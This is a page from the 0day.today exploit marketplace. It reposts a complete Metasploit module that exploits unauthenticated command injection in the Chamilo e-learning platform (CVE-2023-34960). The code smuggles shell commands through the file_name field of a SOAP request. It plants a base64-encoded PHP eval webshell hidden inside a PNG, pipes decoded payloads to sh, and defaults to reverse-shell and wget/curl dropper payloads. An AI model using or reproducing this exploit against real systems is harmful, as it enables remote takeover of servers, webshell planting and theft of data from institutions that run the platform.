0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Chamilo 1.11.18 Command Injection Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
include Msf::Exploit::Format::PhpPayloadPng
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Chamilo unauthenticated command injection in PowerPoint upload',
'Description' => %q{
Chamilo is an e-learning platform, also called Learning Management Systems (LMS).
This module exploits an unauthenticated remote command execution vulnerability
that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).
Due to a functionality called Chamilo Rapid to easily convert PowerPoint
slides to courses on Chamilo, it is possible for an unauthenticated remote
attacker to execute arbitrary commands at OS level using a malicious SOAP
request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.
},
'Author' => [
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Module Author
'Randorisec' # Original research
],
'References' => [
['CVE', '2023-34960'],
['URL', 'https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities'],
['URL', 'https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960']
],
'License' => MSF_LICENSE,
'Platform' => ['php', 'unix', 'linux'],
'Privileged' => false,
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
'Targets' => [
[
'PHP',
{
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
}
}
],
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
'Type' => :linux_dropper,
'Linemax' => 65535,
'CmdStagerFlavor' => ['wget', 'curl'],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2023-06-01',
'DefaultOptions' => {
'SSL' => false,
'RPORT' => 80
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options([
OptString.new('TARGETURI', [ true, 'The Chamilo endpoint URL', '/' ]),
OptString.new('WEBSHELL', [
false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil
], conditions: %w[TARGET == 0])
])
end
def soap_request(cmd)
# create SOAP request exploiting CVE-2023-34960
# Randomize ppt size
ppt_size = "#{rand(720..1440)}x#{rand(360..720)}"
return <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ns1="#{target_uri.path}"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:ns2="http://xml.apache.org/xml-soap"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">`{{}}`.pptx'|" |#{cmd}||a #</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">#{ppt_size}</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
EOS
end
def upload_webshell
# randomize file name if option WEBSHELL is not set
@webshell_name = if datastore['WEBSHELL'].blank?
"#{Rex::Text.rand_text_alpha(8..16)}.php"
else
datastore['WEBSHELL'].to_s
end
@post_param = Rex::Text.rand_text_alphanumeric(1..8)
# inject PHP payload into the PLTE chunk of a PNG image to hide the payload
php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
return nil if png_webshell.nil?
# encode webshell data and write to file on the target for execution
payload = Base64.strict_encode64(png_webshell.to_s)
cmd = "echo #{payload}|openssl enc -a -d > ./#{@webshell_name}"
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
'ctype' => 'text/xml; charset=utf-8',
'data' => soap_request(cmd).to_s
})
end
def execute_php(cmd, _opts = {})
payload = Base64.strict_encode64(cmd)
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main', 'inc', 'lib', 'ppt2png', @webshell_name),
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' => {
@post_param => payload
}
})
end
def execute_command(cmd, _opts = {})
# Encode payload with base64 and decode with openssl (most common installed on unix systems)
payload = Base64.strict_encode64(cmd)
cmd = "echo #{payload}|openssl enc -a -d|sh"
return send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
'ctype' => 'text/xml; charset=utf-8',
'data' => soap_request(cmd).to_s
})
end
def check
# Checking if the target is vulnerable by echoing a randomised marker that will return the marker in the response.
print_status("Checking if #{peer} can be exploited.")
marker = Rex::Text.rand_text_alphanumeric(8..16)
res = execute_command("echo #{marker}")
if res && res.code == 200 && res.body.include?('wsConvertPptResponse') && res.body.include?(marker)
CheckCode::Vulnerable
else
CheckCode::Safe('No valid response received from the target.')
end
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :php
res = upload_webshell
fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body.include?('wsConvertPptResponse')
register_file_for_cleanup(@webshell_name.to_s)
execute_php(payload.encoded)
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager({ linemax: target.opts['Linemax'] })
end
end
end
# 0day.today [2024-11-16] #